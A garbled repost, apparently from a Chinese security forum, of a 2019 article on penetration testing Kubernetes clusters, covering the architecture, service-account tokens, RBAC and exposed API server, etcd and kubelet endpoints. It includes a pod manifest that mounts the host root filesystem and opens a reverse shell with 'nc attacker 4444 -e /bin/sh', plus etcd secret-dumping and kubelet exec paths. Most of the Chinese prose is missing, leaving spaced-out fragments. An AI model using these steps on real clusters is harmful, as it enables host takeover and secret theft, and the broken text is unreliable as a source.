[13837] 2019-03-07_kubernetes集群渗透测试

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2019-03-07_kubernetes集群渗透测试 k u b e r n e t e s     F r e e B u f   2 0 1 9 - 0 3 - 0 7 K u b e r n e t e s 使 ,   K u b e r n e t e s 便 k u b e r n e t e s K u b e r n e t e s M a s t e r N o d e 1 .   M a s t e r M a s t e r K u b e r n e t e s K u b e r n e t e s M a s t e r M a s t e r M a s t e r M a s t e r k u b e - a p i s e r v e r :   M a s t e r K u b e r n e t e s   A P I K u b e r n e t e s e t c d :   K e y - V a l u e K u b e r n e t e s k u b e - s c h e d u l e r :   M a s t e r / / k u b e - c o n t r o l l e r - m a n a g e r M a s t e r 2 .   N o d e
N o d e     K u b e r n e t e s   N o d e P o d N o d e M a s t e r P o d N o d e N o d e k u b e l e t :     N o d e   P o d M a s t e r k u b e - p r o x y :     K u b e r n e t e s   S e r v i c e s D o c k e r   E n g i n e :   N o d e k u b e l e t M a s t e r N o d e k u b e l e t M a s t e r D o c k e r C P U 使 M a s t e r 便 N o d e M a s t e r N o d e P o d 3 .   p o d P o d K u b e r n e t e s P o d P o d P o d h o s t P o d n a m e s p a c e c g r o u p s ,   P o d P o d c o n t a i n e r P o d
S e r v i c e K u b e r n e t e s   S e r v i c e     P o d   访   P o d S e r v i c e 访 L a b e l   S e l e c t o r   b a c k e n d 3 f r o n t e n d     b a c k e n d       b a c k e n d     P o d   f r o n t e n d     b a c k e n d     S e r v i c e     K u b e r n e t e s   K u b e r n e t e s     E n d p o i n t s   A P I   S e r v i c e     P o d       K u b e r n e t e s   K u b e r n e t e s     V I P   访   S e r v i c e S e r v i c e     b a c k e n d   P o d N a m e s p a c e N a m e s p a c e p o d s ,   s e r v i c e s ,   r e p l i c a t i o n   c o n t r o l l e r s d e p l o y m e n t s n a m e s p a c e d e f a u l t n o d e , p e r s i s t e n t V o l u m e s n a m e s p a c e N a m e s p a c e K u b e r n e t e s k u b e - s y s t e m   n a m e s p a c e D e p l o y m e n t D e p l o y m e n t R e p l i c a t i o n C o n t r o l l e r D e p l o y m e n t D e p l o y m e n t P o d D e p l o y m e n t P o d P o d D e p l o y m e n t D e p l o y m e n t R e p l i c a S e t D e p l o y m e n t P o d T e m p l a t e S p e c P o d R e l i c a S e t D e p l o y m e n t R e p l i c a S e t P o d R e p l i c a S e t D e p l o y m e n t D e p l o y m e n t 便 P o d T e m p l a t e S p e c D e p l o y m e n t D e p l o y m e n t R e p l i c a S e t 4 .   p o d
1 .   P o d A P I   S e r v e r R E S T   A P I   K u b e c t l J s o n Y a m l 2 .   A P I   S e r v e r P o d e t c d 3 .   S c h e d u l e A P I   S e r v e r w a t c h P o d P o d N o d e 4 .   P o d 5 .   R e p l i c a t i o n   C o n t r o l l e r 使 6 .   b i n d i n g e t c d 7 .   K u b e l e t P o d c o n t a i n e r d o c k e r   r u n s c h e d u l e r A P I   S e r v e r A P I e t c d b o u n d   p o d p o d K u b e l e t e t c d b o u n d   p o d b o u n d   p o d D o c k e r   A P I p o d 1 .   S e r v i c e   A c c o u n t   p o d 访   a p i s e r v e r k u b e r n e t e s S e r v i c e   A c c o u n t S e r v i c e   A c c o u n t n a m e s p a c e n a m e s p a c e k u b e r n e t e s n a m e s p a c e S e r v i c e   A c c o u n t S e r v i c e   A c c o u n t 访 n a m e s p a c e S e r v i c e   A c c o u n t     p o d s e r v i c e d e p l o y m e n t k u b e r n e t e s   s e r v i c e   a c c o u n t S e r v i c e A c c o u n t   n a m e s p a c e T o k e n     C A n a m e s p a c e     p o d     n a m e s p a c e C A     a p i s e r v e r   t o k e n     m o u n t     p o d     t o k e n     / v a r / r u n / s e c r e t s / k u b e r n e t e s . i o / s e r v i c e a c c o u n t / t o k e n     a p i s e r v e r     t o k e n     b a s e 6 4   C A     / v a r / r u n / s e c r e t s / k u b e r n e t e s . i o / s e r v i c e a c c o u n t / c a . c r t   n a m e s p a c e   / v a r / r u n / s e c r e t s / k u b e r n e t e s . i o / s e r v i c e a c c o u n t / n a m e s p a c e     b a s e 6 4     t o k e n   s y s t e m : s e r v i c e a c c o u n t : ( N A M E S P A C E ) : ( S E R V I C E A C C O U N T )     s y s t e m : s e r v i c e a c c o u n t s     s y s t e m : s e r v i c e a c c o u n t s :
( N A M E S P A C E ) 2 .   R B A C K u b e r n e t e s A B A C 访 R B A C 访 W e b h o o k N o d e A l w a y s D e n y A l w a y s A l l o w 6 1 . 6 K u b e r n e t e s   R B A C 访 1 . 8 R B A C a u t h o r i z a t i o n - m o d e = R B A C R B A C   A P I 1 访 2 访 R B A C   A P I K u b e r n e t e s R o l e 使 C l u s t e r R o l e 访 3 .   K e y s t o n e   P a s s w o r d   K e y s t o n e     o p e n s t a c k   使   o p e n s t a c k     I a a s   使   k e y s t o n e     I a a s     C a a s   A P I   S e r v e r e x p e r i m e n t a l - k e y s t o n e - u r l = h t t p s e x p e r i m e n t a l - k e y s t o n e - c a - f i l e = S O M E F I L E 1 .   k u b e - a p i s e r v e r M a s t e r K u b e r n e t e s   A P I K u b e r n e t e s K u b e r n e t e s   A P I A P I P o d S e r v i c e R e p l i c a t i o n C o n t r o l l e r A P I   S e r v e r R E S T K u b e r n e t e s   A P I   S e r v e r H T T P 1
H T T P 8 0 8 0 i n s e c u r e - p o r t I P i n s e c u r e - b i n d - a d d r e s s H T T P 访 2 S e c u r e   P o r t 6 4 4 3 s e c u r e - p o r t I P b i n d - a d d r e s s H T T P S t l s - c e r t - f i l e t l s - p r i v a t e - k e y - f i l e 使 访 R e s t   A P I , A P I K u b e r n e t e s   A P I   S e r v e r D a s h b o a r d , / u i 访
y a m l p o d p o d p o d / m n t 宿
p o d s h e l l a p i V e r s i o n :   v 1 k i n d :   P o d m e t a d a t a :     n a m e :   t e s t s p e c :     c o n t a i n e r s :     -   n a m e :   b u s y b o x         i m a g e :   b u s y b o x : 1 . 2 9 . 2         c o m m a n d :   [ " / b i n / s h " ]         a r g s :   [ " - c " ,   " n c   a t t a c k e r   4 4 4 4   - e   / b i n / s h " ]         v o l u m e M o u n t s :         -   n a m e :   h o s t             m o u n t P a t h :   / h o s t     v o l u m e s :     -   n a m e :   h o s t         h o s t P a t h :             p a t h :   /             t y p e :   D i r e c t o r y
K u b e r n e t e s k u b e c t l 使 k u b e c t l s h e l l k u b e l e t e n a b l e - d e b u g g i n g - h a n d l e s = t r u e k u b e r n e t e s   P r o x y   A P I / a p i / v 1 / p r o x y / n o d e s / { n a m e } / r u n   # / a p i / v 1 / p r o x y / n o d e s / { n a m e } / e x e c   # / a p i / v 1 / p r o x y / n o d e s / { n a m e } / a t t a c h   # a t t a c h / a p i / v 1 / p r o x y / n o d e s / { n a m e } / p o r t F o r w a r d   # P o d / a p i / v 1 / p r o x y / n o d e s / { n a m e } / l o g s   # / a p i / v 1 / p r o x y / n o d e s / { n a m e } / m e t r i c s   # M e t r i c s / a p i / v 1 / p r o x y / n o d e s / { n a m e } / r u n n i n g p o d s   # P o d / a p i / v 1 / p r o x y / n o d e s / { n a m e } / d e b u g / p p r o f   # w e b C P U 使 访 p o d , 访 / a p i / v 1 / p r o x y / n a m e s p a c e s / { n a m e s p a c e } / p o d s / { n a m e } / { p a t h : * } 2 .   e t c d e t c d m a s t e r r e s t   a p i t o k e n 2 3 7 9 访 / v 2 / k e y s / ? r e c u r s i v e = t r u e J S O N
e t c d c t l 使 A P I / r e g i s t r y / s e c r e t s / d e f a u l t 3 .   K u b e l e t k u b e r n e t e s   n o d e   w o r k e r     w o r k e r     k u b e l e t k u b e l e t     p o d / c o n t a i n e r   k u b e l e t     m a s t e r     k u b e l e t     p o d     k u b e l e t 1 .   2 .     u r l   3 .   A P I   S e r v e r   k u b e r n e t e s   m a s t e r   1 0 2 5 0 k u b e l e t   A P I H T T P S / p o d s e t c d c t l   - - e n d p o i n t = h t t p : / / [ e t c d _ s e r v e r _ i p ] : 2 3 7 9   l s
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则